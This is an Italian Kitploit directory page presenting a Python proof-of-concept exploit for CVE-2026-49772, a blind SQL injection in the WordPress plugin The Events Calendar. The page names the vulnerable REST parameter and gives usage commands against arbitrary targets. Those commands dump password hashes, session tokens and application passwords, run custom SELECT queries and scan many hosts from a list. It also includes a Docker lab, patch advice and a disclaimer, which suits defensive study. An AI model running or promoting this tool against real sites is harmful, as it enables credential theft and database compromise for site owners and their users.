Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-49772 — Exploit di SQL injection cieca per CVE-2026-49772 che prende di mira il plugin WordPress The Events Calendar. Estrae il contenuto del database tramite oracolo booleano/temporale con scansione multithread, dump degli hash utente e supporto per query personalizzate. | Kitploit
Strumenti/GitHubGitHub/joshuavanderpoll/cve-2026-49772
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubjoshuavanderpoll/cve-2026-49772

CVE-2026-49772

Exploit di SQL injection cieca per CVE-2026-49772 che prende di mira il plugin WordPress The Events Calendar. Estrae il contenuto del database tramite oracolo booleano/temporale con scansione multithread, dump degli hash utente e supporto per query personalizzate.

Vedi Repository
32 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

The Events Calendar SQL Injection (CVE-2026-49772) PoC

Python

Descrizione

CVE-2026-49772 è una SQL injection cieca non autenticata nel plugin WordPress The Events Calendar. Un validator di parametri REST difettoso (validate_callback restituisce una closure invece di validare) permette al parametro order sull'API REST sperimentale tec/v1 di raggiungere la clausola SQL ORDER BY non sanificata:

root@kitploit:~
GET /wp-json/tec/v1/events?orderby=event_date&order=<INIEZIONE>
root@kitploit:~
... ORDER BY event_date <INIEZIONE>, wp_posts.post_date DESC ...

Questa è un'iniezione sola lettura (nessuna query impilata, nessuna scrittura, nessun output diretto) — ma l'intero database è estraibile tramite un oracolo booleano/temporale: hash delle password utente, token di sessione, password delle applicazioni, chiavi segrete.

Versioni affette: The Events Calendar 6.15.12 – 6.16.2 (corretto in 6.16.3) Severità: CVSS 3.1 9.3 Critico — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Caratteristiche

  • --check — Rilevamento non invasivo: namespace REST, versione del plugin, conferma temporale
  • --recon — Impronta digitale del DB: versione, utente corrente, database, SO, privilegi, prefisso tabelle
  • --users — Scarica wp_users: login, email, hash delle password
  • --user-meta — Scarica wp_usermeta: token di sessione, password delle applicazioni, capacità
  • --get-table — Scarica qualsiasi tabella con rilevamento automatico delle colonne
  • --query — Estrae il risultato di qualsiasi SELECT scalare
  • Due oracoli — booleano veloce (predefinito) o temporale, multi-thread; nessuna dipendenza esterna

Installazione

Libreria standard pura Python 3 — requirements.txt è incluso per il flusso di lavoro standard ma non installa nulla di extra.

OSX / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help

Utilizzo

root@kitploit:~
python3 CVE-2026-49772.py <target> <azione> [opzioni]

Scegli esattamente un'azione: --check, --recon, --users, --user-meta, --get-table <TABELLA>, --query <SQL>. Esegui --help per tutte le opzioni.


Verifica vulnerabilità

root@kitploit:~
python3 CVE-2026-49772.py target.tld --check

Ricognizione database

root@kitploit:~
python3 CVE-2026-49772.py target.tld --recon

Scarica utenti + hash password

root@kitploit:~
python3 CVE-2026-49772.py target.tld --users

Estrai un valore personalizzato

root@kitploit:~
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"

Ottimizzazione: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout. Scansiona molti host con -l targets.txt.

Docker PoC

Un laboratorio Docker Compose autonomo con il plugin vulnerabile (incluso, non scaricato all'avvio) ed eventi pre-popolati. Vedi docker/DOCKER.md.

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check

Rimedio

  • Aggiorna The Events Calendar alla versione 6.16.3 o successiva
  • Fino alla correzione, blocca /wp-json/tec/v1/ nel WAF / proxy inverso

Riferimenti

  • The Events Calendar
  • CVE.org — CVE-2026-49772
  • NVD — CVE-2026-49772
  • GitHub Advisory — GHSA-v796-wqfq-j4xh
  • Patchstack — The Events Calendar SQL Injection

Disclaimer

Questo strumento è fornito solo per scopi educativi e di ricerca. Usalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta a testare. Il creatore non si assume alcuna responsabilità per qualsiasi uso improprio o danno causato da questo strumento.

Scarica lo strumento